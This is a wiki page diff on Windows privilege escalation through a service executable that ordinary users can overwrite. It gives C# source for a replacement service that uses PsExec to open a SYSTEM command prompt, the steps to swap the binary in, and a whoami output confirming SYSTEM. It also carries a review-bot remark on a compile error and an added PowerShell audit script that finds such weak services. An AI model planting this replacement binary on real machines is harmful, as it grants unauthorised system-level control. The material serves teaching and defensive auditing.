« Privilege escalation »: difference between versions
From Banane Atomic
Line 16:
  protected override void OnStart(string[] args)
  {
-     Thread.Sleep(
+     Thread.Sleep(60000);
+     # Windows services run in session 0 and user account runs in session 1.
+     # use sysinternals' PsExec to run cmd.exe in session 1.
      Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
  }
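Review bot: the two comment lines added inside OnStart start with `#`, which is not a C# line comment; in C# `#` introduces a preprocessor directive, so `# Windows services run in session 0 ...` makes the file fail to compile. Use `//` for both lines, e.g. `// Windows services run in session 0 and user account runs in session 1.`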
Revision of 11 February 2022 at 18:09
With a writable Windows service
If the executable of a Windows service is writable by non-admin users, you can replace it with another executable; when the service starts, that executable runs under the service's account and can launch a command prompt as the system account.
Program.cs:
using System.Diagnostics;
using System.ServiceProcess;
using System.Threading;

class Program
{
    static void Main(string[] args)
    {
        ServiceBase.Run(new ServiceBase[] { new Service() });
    }
}

public class Service : ServiceBase
{
    protected override void OnStart(string[] args)
    {
        // Wait 60 s before launching the prompt.
        Thread.Sleep(60000);
        // Windows services run in session 0 and the user account runs in session 1:
        // use Sysinternals' PsExec to run cmd.exe in session 1.
        Process.Start(@"C:\temp\PsExec.exe", @"-accepteula -d -i 1 C:\Windows\System32\cmd.exe");
    }
}
- Replace the executable of the Windows service with the compiled application.
- A command prompt will be launched when the Windows service starts.
whoami
REM nt authority\system
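As an added defender-side check (not part of the original page), the following PowerShell script lists services whose executable grants write, delete or permission-change rights to broad groups, which is exactly the precondition the technique above relies on. It assumes an English Windows installation (the group names are localized elsewhere) and an account that can read the binaries' ACLs.

```powershell
# Added audit example, not from the original page: find Windows services whose
# executable can be overwritten or replaced by ordinary users.
# Assumption: English principal names (they are localized on non-English installs).
$broadIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

# Rights that let a caller overwrite, delete-and-replace or take over the file.
$writeBits = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'
$writeBits = $writeBits -bor 0x40000000 -bor 0x10000000   # GENERIC_WRITE / GENERIC_ALL as raw bits

function Get-ServiceBinaryPath([string]$PathName) {
    # PathName may be quoted and may carry arguments; keep only the executable.
    if ($PathName.StartsWith('"')) { $exe = $PathName.Split('"')[1] }
    else { $exe = ($PathName -split '\s+')[0] }   # unquoted paths with spaces are a separate weakness
    return [Environment]::ExpandEnvironmentVariables($exe)
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    if (-not $svc.PathName) { continue }
    $exe = Get-ServiceBinaryPath $svc.PathName
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }
    $acl = Get-Acl -LiteralPath $exe -ErrorAction SilentlyContinue
    if (-not $acl) { continue }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadIdentities -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeBits) -eq 0) { continue }
        [PSCustomObject]@{
            Service  = $svc.Name
            RunsAs   = $svc.StartName   # e.g. LocalSystem: the account a replaced binary would run as
            Binary   = $exe
            Identity = $ace.IdentityReference.Value
            Rights   = $ace.FileSystemRights
        }
    }
}
$findings | Format-Table -AutoSize
```

Any row whose RunsAs is LocalSystem is the case this page describes; the remediation is to tighten the binary's ACL (and that of its directory) so that only administrators and the service account can modify it.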